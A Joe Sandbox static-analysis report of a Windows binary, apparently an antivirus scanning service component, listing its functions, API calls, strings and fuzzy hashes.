FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
String ID:
API String ID: 1232609184-0
Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300

Function 0000000140002740 Relevance: 16.6, APIs: 10, Strings: 1, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001AA6
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001B30
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001B48
Part of subcall function 0000000140001A30: LeaveCriticalSection.KERNEL32 ref: 0000000140001BC9
Part of subcall function 0000000140001A30: EnterCriticalSection.KERNEL32 ref: 0000000140001BE6

EnterCriticalSection.KERNEL32 ref: 00000001400027B2
LeaveCriticalSection.KERNEL32 ref: 000000014000286E
GetProcessHeap.KERNEL32 ref: 000000014000287F
HeapFree.KERNEL32 ref: 000000014000288D
GetProcessHeap.KERNEL32 ref: 000000014000289D
HeapFree.KERNEL32 ref: 00000001400028AB
GetProcessHeap.KERNEL32 ref: 00000001400028BB
HeapFree.KERNEL32 ref: 00000001400028C9
GetProcessHeap.KERNEL32 ref: 00000001400028D9
HeapFree.KERNEL32 ref: 00000001400028E7

Strings

H, xrefs: 000000014000278C

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$CriticalSection$EnterFreeProcess$Leave
String ID: H
API String ID: 2107338056-2852464175
Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300

Function 0000000140003200 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 100timeCOMMON

Download Yara Rule

APIs

#4.VSELOG ref: 0000000140003242
EnterCriticalSection.KERNEL32 ref: 0000000140003257
LeaveCriticalSection.KERNEL32 ref: 00000001400032D9
#4.VSELOG ref: 0000000140003353

Part of subcall function 0000000140002B40: LoadLibraryW.KERNEL32 ref: 0000000140002B91
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BAD
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BC8
Part of subcall function 0000000140002B40: GetProcAddress.KERNEL32 ref: 0000000140002BE3
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002C0D
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002C9A
Part of subcall function 0000000140002B40: EnterCriticalSection.KERNEL32 ref: 0000000140002CAF
Part of subcall function 0000000140002B40: LeaveCriticalSection.KERNEL32 ref: 0000000140002D2D

#4.VSELOG ref: 0000000140003389
SetWaitableTimer.KERNEL32 ref: 00000001400033BE

Strings

fnCallback: hScan=%d, putting event %d into listening threads queues, xrefs: 0000000140003372
fnCallback: hScan=%d, evId=%d, context=%p, xrefs: 000000014000323B
fnCallback: hScan=%d, quarantine, result %d, xrefs: 000000014000333F

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
API String ID: 1322048431-2685357988
Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740

Function 0000000140003D50 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 75timeCOMMON

Download Yara Rule

APIs

#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003D84
EnterCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003DA3
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E19
LeaveCriticalSection.KERNEL32(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E25
#4.VSELOG(?,?,?,?,00000000,00000001400022A6), ref: 0000000140003E66
SetWaitableTimer.KERNEL32 ref: 0000000140003EA6

Strings

doCleanup: enter, cAmpEntry %p, xrefs: 0000000140003D76
doCleanup: pid %d, removing cAmpEntry, index is %d, xrefs: 0000000140003E08
doCleanup: pid %d, marking the cAmpEntry pointer for deletion, xrefs: 0000000140003E58

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$EnterLeaveTimerWaitable
String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
API String ID: 2984211723-3002863673
Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710

Function 00000001400021A0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

#4.VSELOG ref: 00000001400021D4
OpenProcess.KERNEL32 ref: 00000001400021F7
#4.VSELOG ref: 000000014000223A
WaitForMultipleObjects.KERNEL32 ref: 000000014000224F
CloseHandle.KERNEL32 ref: 000000014000225A
#4.VSELOG ref: 0000000140002294

Strings

doMonitor: end process id=%d, result from WaitForMultipleObjects=%d, xrefs: 0000000140002283
doMonitor: monitoring process id=%d, xrefs: 000000014000222C
fnMonitor: monitor thread for ctx %p, xrefs: 00000001400021C6

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CloseHandleMultipleObjectsOpenProcessWait
String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
API String ID: 678758403-4129911376
Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710

Function 0000000140001750 Relevance: 15.1, APIs: 12, Instructions: 133memorystringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32 ref: 0000000140001797
GetProcessHeap.KERNEL32 ref: 00000001400017A6
HeapAlloc.KERNEL32 ref: 00000001400017B4
lstrlenW.KERNEL32 ref: 00000001400017EC
GetProcessHeap.KERNEL32 ref: 00000001400017FB
HeapAlloc.KERNEL32 ref: 0000000140001809
lstrlenW.KERNEL32 ref: 000000014000183F
GetProcessHeap.KERNEL32 ref: 000000014000184E
HeapAlloc.KERNEL32 ref: 000000014000185C
lstrlenW.KERNEL32 ref: 000000014000188D
GetProcessHeap.KERNEL32 ref: 000000014000189C
HeapAlloc.KERNEL32 ref: 00000001400018AA

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen
String ID:
API String ID: 3424473247-0
Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700

Function 0000000140012C70 Relevance: 14.4, APIs: 4, Strings: 4, Instructions: 415COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0000000140011270: RtlLookupFunctionEntry.KERNEL32 ref: 00000001400112F1

__GetUnwindTryBlock.LIBCMT ref: 0000000140012CDD
__SetUnwindTryBlock.LIBCMT ref: 0000000140012D05
__GetUnwindTryBlock.LIBCMT ref: 0000000140012D15
_SetThrowImageBase.LIBCMT ref: 0000000140012DA6

Strings

csm, xrefs: 0000000140012E97
csm, xrefs: 0000000140012DC1
csm, xrefs: 0000000140012D2F
bad exception, xrefs: 0000000140012E4A

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
String ID: bad exception$csm$csm$csm
API String ID: 3766904988-820278400
Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700

Function 0000000140004750 Relevance: 13.6, APIs: 9, Instructions: 80sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000140004A0F
LeaveCriticalSection.KERNEL32 ref: 0000000140004A1D
WaitForMultipleObjects.KERNEL32 ref: 0000000140004A44
Sleep.KERNEL32 ref: 0000000140004A75
EnterCriticalSection.KERNEL32 ref: 0000000140004A7F
SetEvent.KERNEL32 ref: 0000000140004AC5
ResetEvent.KERNEL32 ref: 0000000140004ACF
LeaveCriticalSection.KERNEL32 ref: 0000000140004AD9
WaitForMultipleObjects.KERNEL32 ref: 0000000140004B0D

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
String ID:
API String ID: 2707001247-0
Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708

Function 00007FF8FDF94804 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FF8FDF94861

Part of subcall function 00007FF8FDF96BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FF8FDF96C07
Part of subcall function 00007FF8FDF96BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FF8FDF96C2C

Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FF8FDF94939
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FF8FDF94B87
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF8FDF94C94

Strings

csm, xrefs: 00007FF8FDF9487B
csm, xrefs: 00007FF8FDF9495C
csm, xrefs: 00007FF8FDF948E2

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
String ID: csm$csm$csm
API String ID: 849930591-393685449
Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction ID: c008c79c6a82141b00ed32f9352116aaf4fbd8d457fd392b45dbbe9d5bf44be0
Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
Instruction Fuzzy Hash: B2D19E63E087418EEB209F6598407AD37A0FB657E8F100135EB6E57B95EF38E481C786

Function 0000000140001690 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014000169E
HeapFree.KERNEL32 ref: 00000001400016B0
GetProcessHeap.KERNEL32 ref: 00000001400016C0
HeapFree.KERNEL32 ref: 00000001400016D2
GetProcessHeap.KERNEL32 ref: 00000001400016E2
HeapFree.KERNEL32 ref: 00000001400016F4
GetProcessHeap.KERNEL32 ref: 0000000140001704
HeapFree.KERNEL32 ref: 0000000140001716
GetProcessHeap.KERNEL32 ref: 0000000140001726
HeapFree.KERNEL32 ref: 0000000140001738

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601

Function 0000000140013710 Relevance: 12.5, APIs: 10, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32 ref: 000000014001371E
HeapFree.KERNEL32 ref: 0000000140013730
GetProcessHeap.KERNEL32 ref: 0000000140013740
HeapFree.KERNEL32 ref: 0000000140013752
GetProcessHeap.KERNEL32 ref: 0000000140013762
HeapFree.KERNEL32 ref: 0000000140013774
GetProcessHeap.KERNEL32 ref: 0000000140013784
HeapFree.KERNEL32 ref: 0000000140013796
GetProcessHeap.KERNEL32 ref: 00000001400137A6
HeapFree.KERNEL32 ref: 00000001400137B8

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601

Function 00007FF8FDF9B86C Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32 ref: 00007FF8FDF9B9E8
GetProcAddress.KERNEL32 ref: 00007FF8FDF9B9F4

Strings

ext-ms-, xrefs: 00007FF8FDF9B945
api-ms-, xrefs: 00007FF8FDF9B932

Memory Dump Source

Source File: 00000007.00000002.2002780109.00007FF8FDF91000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FDF90000, based on PE: true

Associated: 00000007.00000002.2002757870.00007FF8FDF90000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002809208.00007FF8FDFA2000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002832834.00007FF8FDFAD000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2002854171.00007FF8FDFAF000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_7ff8fdf90000_XY3LL0.jbxd

Similarity

API ID: AddressFreeLibraryProc
String ID: api-ms-$ext-ms-
API String ID: 3013587201-537541572
Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction ID: cd8a6948e53840472f4d9426f08fe61910f978aba144b9b2cc2688dc54c760fb
Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
Instruction Fuzzy Hash: 9D41C023F29A1659EB158B22DC50AAA2290FF25BF4F484535DE2F877D4FE3CE4058281

Function 0000000140002A00 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 66registryCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32 ref: 0000000140002A3C
RegQueryValueExW.ADVAPI32 ref: 0000000140002A76
RegCloseKey.ADVAPI32 ref: 0000000140002A96
EnterCriticalSection.KERNEL32 ref: 0000000140002AAB
LeaveCriticalSection.KERNEL32 ref: 0000000140002B31

Strings

action, xrefs: 0000000140002A52
SYSTEM\CurrentControlSet\Services\vseamps\Parameters, xrefs: 0000000140002A0D

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
API String ID: 1119674940-1966266597
Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00

Function 0000000140001900 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 56memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004BE7
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004BF6
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C04
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C3E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C4D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004C5B
Part of subcall function 0000000140004BA0: lstrlenW.KERNEL32 ref: 0000000140004C8E
Part of subcall function 0000000140004BA0: GetProcessHeap.KERNEL32 ref: 0000000140004C9D
Part of subcall function 0000000140004BA0: HeapAlloc.KERNEL32 ref: 0000000140004CAB

GetComputerNameW.KERNEL32 ref: 0000000140001991
lstrlenW.KERNEL32 ref: 000000014000199C
GetProcessHeap.KERNEL32 ref: 00000001400019AB
HeapAlloc.KERNEL32 ref: 00000001400019B9

Strings

ampIfEp, xrefs: 000000014000195E
Security=impersonation static true, xrefs: 0000000140001952
ncalrpc, xrefs: 000000014000196D

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: Heap$AllocProcesslstrlen$ComputerName
String ID: Security=impersonation static true$ampIfEp$ncalrpc
API String ID: 3702919091-996641649
Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
Opcode Fuzzy Hash: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
Instruction Fuzzy Hash: 4F212A71215B8082EB12CB12F84438A73A4F789BE8F514216EB9D07BB8DF7DC54ACB00

Function 000000014000F3E0 Relevance: 10.7, APIs: 7, Instructions: 179COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F43A
GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F459
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F4FF
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F559
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F592
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F5CF
WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,00000001,?,00000000,?,?,?), ref: 000000014000F60E

Memory Dump Source

Source File: 00000007.00000002.2002662103.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 00000007.00000002.2002646226.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002686745.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002707796.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000007.00000002.2002731052.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_140000000_XY3LL0.jbxd

Similarity

API ID: ByteCharMultiWide$Info
String ID:
API String ID: 1775632426-0
Opcode ID: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
Instruction ID: 43b9ce706039119b05782f2693b3e997f7dca892eef84fff4304595f3d56aff3
Opcode Fuzzy Hash: 66d9eb7914d19e8cfe6722e8c0a791cb2122334676924f0ca9c1b8cdf3048d99
